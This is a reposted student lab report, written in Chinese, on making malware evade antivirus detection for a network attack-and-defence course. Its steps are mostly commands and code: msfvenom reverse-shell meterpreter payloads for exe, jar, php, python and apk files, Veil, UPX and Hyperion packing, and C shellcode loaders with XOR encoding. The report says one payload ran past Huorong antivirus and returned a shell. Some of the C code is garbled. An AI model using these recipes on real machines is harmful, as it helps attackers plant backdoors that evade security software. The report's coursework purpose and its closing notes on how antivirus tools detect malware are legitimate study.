20222413 2024-2025-1 《网络与系统攻防技术》实验三实验报告

news/2024/10/29 22:01:56/文章来源:https://www.cnblogs.com/hhshhs/p/18514203

1.实验内容

1.1学习总结
本周的学习内容为恶意代码的概念、发展历史以及分析技术。我知晓了恶意代码的不同类型及其典型案例、攻击方式和危害。同时我了解了静态分析和动态分析所采用的技术方法。
1.2实践内容
(1)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

  • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
  • veil,加壳工具
  • 使用C + shellcode编程

(2)通过组合应用各种技术实现恶意代码免杀
如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。
(3)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

2.实验过程

2.1.1正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
(1)使用msf编码器进行恶意代码编写
①查看虚拟机的ip地址

②生成实验二所使用的后门程序

③生成完毕后在https://www.virustotal.com/gui/home/upload网站检测该程序,所得结果如下

④对生成的后门程序进行多次编码

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -b '\x00' LHOST=192.168.117.129 LPORT=2413 -f exe > 20222413_backdoor_1.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.117.129 LPORT=2413 -f exe > 20222413_backdoor_1.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 1 -b '\x00' LHOST=192.168.117.129 LPORT=2413 -f exe > 20222413_backdoor_1.exe

编码一次检测结果:

编码十次检测结果:

编码二十次检测结果:

总的来说多次编码对于免杀效果的影响微乎其微
(2)使用msfvenom生成其它类型的文件

msfvenom -p java/meterpreter/reverse_tcp -b '\x00' LHOST=192.168.117.129 LPORT=2413 x> 20222413.jar
输出jar文件
msfvenom -p php/meterpreter/reverse_tcp -b '\x00' LHOST=192.168.117.129 LPORT=2413 x> 20222413.php
输出php文件
msfvenom -p python/meterpreter/reverse_tcp -b '\x00' LHOST=192.168.117.129 LPORT=2413 x> 20222413.py
输出python文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.117.129 LPORT=2413 x> 20222413.apk
输出apk文件

所得免杀检测结果如下:
①jar

②php

③python

④apk

2.1.2使用veil,加壳工具
(1)veil下载完成后输入

veil
use evasion
use+payload类型,如use c/meterpreter/rev_tcp.py
输入list查看可使用的payload
set LHOST 192.168.117.129
set LPORT 2413
generate
20222413_veil






生成结果免杀效果如下:
①powershell
②C语言

③python

④ruby

(2)其他加壳工具
①使用upx对生成的c语言payload加压缩壳

upx 20222413_c_veil.exe -o 20222413_c_upxveil.exe


免杀检测结果:

②使用hyperion加密加壳

cp 20222413_c_veil.exe /usr/share/windows-resources/hyperion
将生成的C语言payload复制到hyperion文件夹中
wine hyperion.exe -v 20222413_c_veil.exe 20222413_c_veil_hyp.exe
使用hyperion对文件加密,生成的文件命名为20222413_c_veil_hyp.exe


免杀效果检测:

2.1.3使用C + shellcode编程
(1)使用msfvenom生成shellcode数组

(2)建立C文件

#include <stdio.h>
#include <stdlib.h>
unsigned char buf[] = "生成的shellcode" ;
int main() {
int (func)() = (int ()()) buf;
(func)();
return 0;
}

(3)编译C文件

(4)免杀效果检测

2.2通过组合应用各种技术实现恶意代码免杀
(1)使用C+shellcode+异或进行免杀,生成shellcode代码

(2)使用C语言对shellcode进行异或处理
#include <stdio.h>
#include <stdlib.h>
unsigned char buf[] = "生成的shellcode" ;
int main(){
FILE *fptr;
fptr = fopen("shellcode.txt","w");
for(int i=0;i<sizeof(buf)-1;i++){
buf[i]^=0x01;
fprintf(fptr,"\x%x",buf[i]);
}
if(fptr==NULL){
printf("Error!");
exit(1);
}
fclose(fptr);
return 0;
}


使用gcc编译执行

得到异或后的shellcode

(3)使用异或的shellcode编写c文件

#include <stdio.h>
#include <stdlib.h>
unsigned char buf[] = "生成的shellcode" ;
int main() {
int i;
for(int i=0;i<sizeof(buf)-1;i++){
buf[i]^=0x01;
}
int (func)();
func = (int (
)()) buf;
(func)();
}

(4)编译C文件为exe

(5)免杀效果检测

2.3用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
(1)生成后门文件20222413.raw

(2)通过共享文件夹将20222413.raw传送到主机

(3)使用杀毒工具进行检测
所用杀毒软件为火绒,版本为6.0.3.0

查杀结果如下

生成的后门程序并未被杀毒软件发现
(4)kali进入msf控制台,配置完成后在主机端使用shell_launcher运行后门程序,随后可获取主机shell

3.问题及解决方案

  • 问题1:在下载veil的时候,报错wget: unable to resolve host address
  • 问题1解决方案:错误原因为无法解析主机地址,进入/etc/resolv.conf修改DNS,将DNS地址改为google域名服务器
    在文件最后插入
    nameserver 8.8.8.8
    nameserver 8.8.4.4

4.实验问题回答

(1)杀软是如何检测出恶意代码的?

  • 特征码扫描:分析比对文件特征码与已知的恶意代码的特征码是否相同
  • 启发式扫描:分析程序的行为判断是否为恶意代码。当程序中出现恶意行为,如访问与修改系统资源时,将该程序判定为恶意代码。
  • 沙盒模拟技术‌:将待检测文件置于隔离的虚拟环境中运行,分析其行为和函数调用是否出现恶意行为
  • 云查杀技术‌:借助云计算技术迅速分析大量数据,识别新出现的恶意软件。

(2)免杀是做什么?

  • 通过使用技术手段修改恶意代码,使其无法被杀毒软件检测到,从而可以在目标系统中运行。

(3)免杀的基本方法有哪些?

  • 修改特征码,如加壳(加密壳与压缩壳)、encode编码、使用其他语言重写后编译
  • 改变行为,使用反弹式连接、隧道技术、加密数据等不易被判定为恶意行为的通讯方式。

5.学习感悟、思考等

本次实验内容为恶意代码的免杀原理与实践。通过本次实验,我了解到如何使用msf编码器、veil、upx和hyperion加壳以及c+shellcode技术。令我印象深刻的是veil的下载,过程很繁琐,在下载过程中虚拟机重启后出现了黑屏的问题,只能重装虚拟机。虽然过程有一点折磨,但最终得到每种方法的免杀检测结果、了解更多网络攻防技术知识带来的获得感令人欣喜。

参考资料

  • 实验指导书:https://gitee.com/wildlinux/NetSec/blob/master/ExpGuides/0x23_MAL_免杀原理与实践.md
  • 附件:https://gitee.com/wildlinux/NetSec/attach_files

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/823891.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

工作牌佩戴监测识别系统

工作牌佩戴监测识别系统充分利用了工厂现场已有的摄像头设备,无需额外的硬件投入。工作牌佩戴监测识别系统采用AI视频智能分析算法,实时对监控区域内的工作人员进行识别和检测。系统可以准确识别出人员是否佩戴了工作牌,并判断其是否符合要求。工作牌佩戴监测识别系统一旦监…

线性代数的解法

线性代数 数学的思维方式: graph TBid1(#观察#客观现象)--提出主要研究的问题\n抓住主要特征-->id2(#抽象#出概念或建立模型)id2-->id3(#探索#应用直觉,类比,归纳,联想,推理) id3-->id4(#猜测#可能有的规律)id4-->id5(#论证#深入分析,应用定义,公理,证明过的定理进…

分子机器人和纳米机器人有什么区别

在纳米科技和分子工程领域,分子机器人和纳米机器人是两种先进的概念,它们在设计、功能、应用和制造技术上存在显著差异。本文旨在探讨分子机器人与纳米机器人之间的主要区别:1.定义和尺寸范围;2.制造材料和技术;3.功能和应用领域;4.研究和发展挑战;5.未来发展趋势。了解…

基于Java+SpringBoot+Mysql实现的古诗词平台功能设计与实现八

可以二次开发 前台功能:首页、诗文、作者、名句、成语、赏析、翻译、典籍、注册、登录、个人中心等。 后台功能:作者列表、古诗词列表、名句列表、成语列表、典籍列表、用户管理、赏析管理、翻译管理等。 部分功能: 后台管理古诗词信息控制器Controller、后台名言名句信息控…

数据采集与融合技术实践第三次作业

作业1 要求:指定一个网站,爬取这个网站中的所有的所有图片,例如:中国气象网(http://www.weather.com.cn)。使用scrapy框架分别实现单线程和多线程的方式爬取。 务必控制总页数(学号尾数2位)、总下载的图片数量(尾数后3位)等限制爬取的措施。 输出信息:代码:weather…

实验3_C语言函数应用编程

任务一:#include <stdio.h> char score_to_grade(int score); int main() { int score; char grade; while(scanf("%d", &score) != EOF) { grade = score_to_grade(score);printf("分数: %d, 等级: %c\n\n", score, grade); } return 0;…

强化学习的数学原理-07时序差分方法

目录引入TD learing of state valuesTD learing of action values SarsaTD learing of action values Expected SarsaTD learing of action values n-step SarsaTD learing of optimal action values:Q-learninga unified point of view 引入这三个例子是层层递进的,都可以用…

HarmonyOS NEXT 组件市场在DevEco Studio,安装出现Fail to load plugin descriptor from file cases-master.zip

HarmonyOS NEXT开源组件市场 https://gitee.com/harmonyos-cases/cases根据gitee的下载连接,下载了cases-master.zip。如果在dev studio -settings-plugins-设置按钮-install from disk ,会报错,说明这个不是真正的插件包。 解压这个zip,在plugin文件夹下有个case_plugin-…

网络攻防实验 -- 渗透测试作业三

目录漏洞复现:1.利用宏病毒感染word文档获取shell复现2.实现CVE-2020-0796永恒之黑漏洞利用3.实现Microsoft Windows远程溢出漏洞CVE-2012-0002利用4.实现MS11-003(CVE-2001-0036)漏洞利用5.实现IE浏览器的极光漏洞利用6.实现Adobe Reader 9漏洞利用7.渗透攻击Metasploitabl…

2024网鼎杯初赛-青龙组-WEB gxngxngxn

WEB01 开局随便随便输入都可以登录,登上去以后生成了一个token和一个session,一个是jwt一个是flask框架的 这边先伪造jwt,是国外的原题 CTFtime.org / DownUnderCTF 2021 (线上) / JWT / Writeup 先生成两个token,然后利用rsa_sign2n工具来生成公钥python3 jwt_forgery.py…

网络攻防实验 -- 渗透测试作业一

一 nmap命令 SERVICE/VERSION DETECTION:-sV: Probe open ports to determine service/version infoHOST DISCOVERY:-sn: Ping Scan - disable port scan # 检测主机是否在线,不显示任何端口信息。1.使用nmap搜寻网络内活跃的主机2.使用nmap扫描目标主机端口信息和服务版本号3.…

手机app开发用的是什么语言有哪些优势

手机APP开发是一项涉及多种编程语言的任务。开发者可以根据需求、平台以及个人偏好选择合适的语言。手机app开发用的语言有:1、Java;2、Kotlin;3、Swift;4、JavaScript/TypeScript;5、Dart。作为Android平台的主要开发语言,Java拥有庞大的开发者社区和丰富的开源库。它的…